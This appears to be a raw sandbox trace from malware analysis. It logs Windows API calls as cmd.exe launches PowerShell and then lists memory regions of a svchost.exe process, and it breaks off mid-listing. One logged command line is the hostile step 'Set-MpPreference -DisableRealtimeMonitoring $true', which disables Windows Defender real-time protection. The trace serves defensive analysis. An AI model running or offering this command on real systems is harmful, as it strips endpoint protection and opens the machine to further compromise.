_wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0140.905] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0140.905] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0140.905] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0140.905] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0140.905] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0140.905] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0140.905] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0140.905] GetEnvironmentStringsW () returned 0x6821e0* [0140.905] FreeEnvironmentStringsW (penv=0x6821e0) returned 1 [0140.905] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.905] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0140.905] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0140.905] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0140.905] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0140.905] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0140.905] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0140.905] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0140.905] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0140.905] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0140.905] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x20f738 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.905] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x20f738, lpFilePart=0x20f734 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f734*="system32") returned 0x13 [0140.905] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x10 [0140.906] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x20f4b4 | out: lpFindFileData=0x20f4b4) returned 0x6707f0 [0140.906] FindClose (in: hFindFile=0x6707f0 | out: hFindFile=0x6707f0) returned 1 [0140.906] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x20f4b4 | out: lpFindFileData=0x20f4b4) returned 0x6707f0 [0140.906] FindClose (in: hFindFile=0x6707f0 | out: hFindFile=0x6707f0) returned 1 [0140.906] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x10 [0140.906] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0140.906] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0140.906] GetEnvironmentStringsW () returned 0x6821e0* [0140.906] FreeEnvironmentStringsW (penv=0x6821e0) returned 1 [0140.906] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a0b5260 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0140.907] GetConsoleOutputCP () returned 0x1b5 [0140.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0140.983] GetUserDefaultLCID () returned 0x409 [0140.983] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a0b4950, cchData=8 | out: lpLCData=":") returned 2 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x20f878, cchData=128 | out: lpLCData="0") returned 2 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x20f878, cchData=128 | out: lpLCData="0") returned 2 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x20f878, cchData=128 | out: lpLCData="1") returned 2 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a0b4940, cchData=8 | out: lpLCData="/") returned 2 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a0b4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a0b4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a0b4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a0b4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a0b4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a0b4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a0b4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a0b4930, cchData=8 | out: lpLCData=".") returned 2 [0140.984] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a0b4920, cchData=8 | out: lpLCData=",") returned 2 [0140.984] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0140.985] GetConsoleTitleW (in: lpConsoleTitle=0x684a70, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.985] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76220000 [0140.985] GetProcAddress (hModule=0x76220000, lpProcName="CopyFileExW") returned 0x76253b92 [0140.985] GetProcAddress (hModule=0x76220000, lpProcName="IsDebuggerPresent") returned 0x76234a5d [0140.985] GetProcAddress (hModule=0x76220000, lpProcName="SetConsoleInputExeNameW") returned 0x7624a79d [0140.986] _wcsicmp (_String1="powershell", _String2=")") returned 71 [0140.986] _wcsicmp (_String1="FOR", _String2="powershell") returned -10 [0140.986] _wcsicmp (_String1="FOR/?", _String2="powershell") returned -10 [0140.986] _wcsicmp (_String1="IF", _String2="powershell") returned -7 [0140.986] _wcsicmp (_String1="IF/?", _String2="powershell") returned -7 [0140.986] _wcsicmp (_String1="REM", _String2="powershell") returned 2 [0140.986] _wcsicmp (_String1="REM/?", _String2="powershell") returned 2 [0140.988] GetConsoleTitleW (in: lpConsoleTitle=0x20f570, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0140.989] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0140.989] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0140.989] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0140.989] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0140.989] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0140.989] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0140.989] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0140.989] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0140.989] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0140.989] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0140.989] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0140.989] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0140.989] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0140.989] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0140.989] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0140.989] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0140.989] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0140.989] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0140.989] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0140.989] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0140.989] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0140.989] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0140.989] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0140.989] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0140.989] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0140.989] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0140.989] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0140.989] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0140.989] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0140.989] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0140.989] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0140.989] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0140.989] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0140.989] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0140.989] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0140.989] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0140.989] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0140.989] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0140.989] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0140.989] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0140.990] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0140.990] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0140.990] _wcsicmp (_String1="powershell", _String2="DIR") returned 12 [0140.990] _wcsicmp (_String1="powershell", _String2="ERASE") returned 11 [0140.990] _wcsicmp (_String1="powershell", _String2="DEL") returned 12 [0140.990] _wcsicmp (_String1="powershell", _String2="TYPE") returned -4 [0140.990] _wcsicmp (_String1="powershell", _String2="COPY") returned 13 [0140.990] _wcsicmp (_String1="powershell", _String2="CD") returned 13 [0140.990] _wcsicmp (_String1="powershell", _String2="CHDIR") returned 13 [0140.990] _wcsicmp (_String1="powershell", _String2="RENAME") returned -2 [0140.990] _wcsicmp (_String1="powershell", _String2="REN") returned -2 [0140.990] _wcsicmp (_String1="powershell", _String2="ECHO") returned 11 [0140.990] _wcsicmp (_String1="powershell", _String2="SET") returned -3 [0140.990] _wcsicmp (_String1="powershell", _String2="PAUSE") returned 14 [0140.990] _wcsicmp (_String1="powershell", _String2="DATE") returned 12 [0140.990] _wcsicmp (_String1="powershell", _String2="TIME") returned -4 [0140.990] _wcsicmp (_String1="powershell", _String2="PROMPT") returned -3 [0140.990] _wcsicmp (_String1="powershell", _String2="MD") returned 3 [0140.990] _wcsicmp (_String1="powershell", _String2="MKDIR") returned 3 [0140.990] _wcsicmp (_String1="powershell", _String2="RD") returned -2 [0140.990] _wcsicmp (_String1="powershell", _String2="RMDIR") returned -2 [0140.990] _wcsicmp (_String1="powershell", _String2="PATH") returned 14 [0140.990] _wcsicmp (_String1="powershell", _String2="GOTO") returned 9 [0140.990] _wcsicmp (_String1="powershell", _String2="SHIFT") returned -3 [0140.990] _wcsicmp (_String1="powershell", _String2="CLS") returned 13 [0140.990] _wcsicmp (_String1="powershell", _String2="CALL") returned 13 [0140.990] _wcsicmp (_String1="powershell", _String2="VERIFY") returned -6 [0140.990] _wcsicmp (_String1="powershell", _String2="VER") returned -6 [0140.990] _wcsicmp (_String1="powershell", _String2="VOL") returned -6 [0140.990] _wcsicmp (_String1="powershell", _String2="EXIT") returned 11 [0140.990] _wcsicmp (_String1="powershell", _String2="SETLOCAL") returned -3 [0140.990] _wcsicmp (_String1="powershell", _String2="ENDLOCAL") returned 11 [0140.990] _wcsicmp (_String1="powershell", _String2="TITLE") returned -4 [0140.990] _wcsicmp (_String1="powershell", _String2="START") returned -3 [0140.990] _wcsicmp (_String1="powershell", _String2="DPATH") returned 12 [0140.990] _wcsicmp (_String1="powershell", _String2="KEYS") returned 5 [0140.990] _wcsicmp (_String1="powershell", _String2="MOVE") returned 3 [0140.990] _wcsicmp (_String1="powershell", _String2="PUSHD") returned -6 [0140.990] _wcsicmp (_String1="powershell", _String2="POPD") returned 7 [0140.990] _wcsicmp (_String1="powershell", _String2="ASSOC") returned 15 [0140.990] _wcsicmp (_String1="powershell", _String2="FTYPE") returned 10 [0140.991] _wcsicmp (_String1="powershell", _String2="BREAK") returned 14 [0140.991] _wcsicmp (_String1="powershell", _String2="COLOR") returned 13 [0140.991] _wcsicmp (_String1="powershell", _String2="MKLINK") returned 3 [0140.991] _wcsicmp (_String1="powershell", _String2="FOR") returned 10 [0140.991] _wcsicmp (_String1="powershell", _String2="IF") returned 7 [0140.991] _wcsicmp (_String1="powershell", _String2="REM") returned -2 [0140.991] _wcsnicmp (_String1="powe", _String2="cmd ", _MaxCount=0x4) returned 13 [0140.991] SetErrorMode (uMode=0x0) returned 0x0 [0140.991] SetErrorMode (uMode=0x1) returned 0x0 [0140.992] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x684ea8, lpFilePart=0x20f090 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x20f090*="system32") returned 0x13 [0140.992] SetErrorMode (uMode=0x0) returned 0x1 [0140.992] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0140.992] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0140.997] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a0c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0140.997] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.997] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0140.998] GetLastError () returned 0x2 [0140.998] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0140.998] GetLastError () returned 0x2 [0140.998] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.998] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0140.998] GetLastError () returned 0x2 [0140.998] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\powershell", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0140.998] GetLastError () returned 0x2 [0140.998] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.998] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0140.999] GetLastError () returned 0x2 [0140.999] FindFirstFileExW (in: lpFileName="C:\\Windows\\powershell", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0140.999] GetLastError () returned 0x2 [0140.999] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0140.999] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0141.000] GetLastError () returned 0x2 [0141.000] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\powershell", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0141.001] GetLastError () returned 0x2 [0141.001] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0141.001] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.*", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0x681e48 [0141.001] FindClose (in: hFindFile=0x681e48 | out: hFindFile=0x681e48) returned 1 [0141.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.COM", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0xffffffff [0141.002] GetLastError () returned 0x2 [0141.002] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.EXE", fInfoLevelId=0x1, lpFindFileData=0x20ee0c, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x20ee0c) returned 0x671248 [0141.002] FindClose (in: hFindFile=0x671248 | out: hFindFile=0x671248) returned 1 [0141.002] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0141.002] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0141.002] GetConsoleTitleW (in: lpConsoleTitle=0x20f304, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0141.002] InitializeProcThreadAttributeList (in: lpAttributeList=0x20f18c, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x20f254 | out: lpAttributeList=0x20f18c, lpSize=0x20f254) returned 1 [0141.002] UpdateProcThreadAttribute (in: lpAttributeList=0x20f18c, dwFlags=0x0, Attribute=0x60001, lpValue=0x20f24c, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x20f18c, lpPreviousValue=0x0) returned 1 [0141.002] GetStartupInfoW (in: lpStartupInfo=0x20f148 | out: lpStartupInfo=0x20f148*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0141.002] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0141.002] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0141.002] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0141.002] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.002] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.002] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0141.002] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0141.003] _wcsnicmp (_String1="COPYCMD", _String2="windows", _MaxCount=0x7) returned -20 [0141.003] lstrcmpW (lpString1="\\powershell.exe", lpString2="\\XCOPY.EXE") returned -1 [0141.005] CreateProcessW (in: lpApplicationName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Windows\\system32", lpStartupInfo=0x20f1e8*(cb=0x48, lpReserved=0x0, lpDesktop="WinSta0\\Default", lpTitle="powershell Set-MpPreference -DisableRealtimeMonitoring $true", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x20f234 | out: lpCommandLine="powershell Set-MpPreference -DisableRealtimeMonitoring $true", lpProcessInformation=0x20f234*(hProcess=0x78, hThread=0x74, dwProcessId=0x9c4, dwThreadId=0x9b0)) returned 1 [0141.008] CloseHandle (hObject=0x74) returned 1 [0141.008] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0141.008] GetEnvironmentStringsW () returned 0x683f90* [0141.008] FreeEnvironmentStringsW (penv=0x683f90) returned 1 [0141.008] WaitForSingleObject (hHandle=0x78, dwMilliseconds=0xffffffff) returned 0x0 [0161.564] GetExitCodeProcess (in: hProcess=0x78, lpExitCode=0x20f128 | out: lpExitCode=0x20f128*=0x1) returned 1 [0161.564] CloseHandle (hObject=0x78) returned 1 [0161.564] _vsnwprintf (in: _Buffer=0x20f270, _BufferCount=0x13, _Format="%08X", _ArgList=0x20f134 | out: _Buffer="00000001") returned 8 [0161.564] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000001") returned 1 [0161.564] GetEnvironmentStringsW () returned 0x6821e0* [0161.564] FreeEnvironmentStringsW (penv=0x6821e0) returned 1 [0161.564] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0161.564] GetEnvironmentStringsW () returned 0x6821e0* [0161.565] FreeEnvironmentStringsW (penv=0x6821e0) returned 1 [0161.565] DeleteProcThreadAttributeList (in: lpAttributeList=0x20f18c | out: lpAttributeList=0x20f18c) [0161.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.565] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0161.565] _get_osfhandle (_FileHandle=1) returned 0x7 [0161.565] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a0b41ac | out: lpMode=0x4a0b41ac) returned 1 [0161.565] _get_osfhandle (_FileHandle=0) returned 0x3 [0161.565] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a0b41b0 | out: lpMode=0x4a0b41b0) returned 1 [0161.565] SetConsoleInputExeNameW () returned 0x1 [0161.565] GetConsoleOutputCP () returned 0x1b5 [0161.565] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a0b4260 | out: lpCPInfo=0x4a0b4260) returned 1 [0161.565] SetThreadUILanguage (LangId=0x0) returned 0x409 [0161.566] exit (_Code=1) Process: id = "21" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x8b5a000" os_pid = "0x980" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0x668" cmd_line = "C:\\Windows\\system32\\svchost.exe" cur_dir = "C:\\Windows\\system32\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e662" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2758 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2759 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 2760 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 2761 start_va = 0x50000 end_va = 0x50fff entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 2762 start_va = 0x110000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 2763 start_va = 0x77c40000 end_va = 0x77de8fff entry_point = 0x77c40000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2764 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2765 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2766 start_va = 0x7fffd000 end_va = 0x7fffdfff entry_point = 0x0 region_type = private name = "private_0x000000007fffd000" filename = "" Region: id = 2767 start_va = 0xffc20000 end_va = 0xffc2afff entry_point = 0xffc20000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe") Region: id = 2768 start_va = 0x7fefff60000 end_va = 0x7fefff60fff entry_point = 0x7fefff60000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2769 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 2770 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 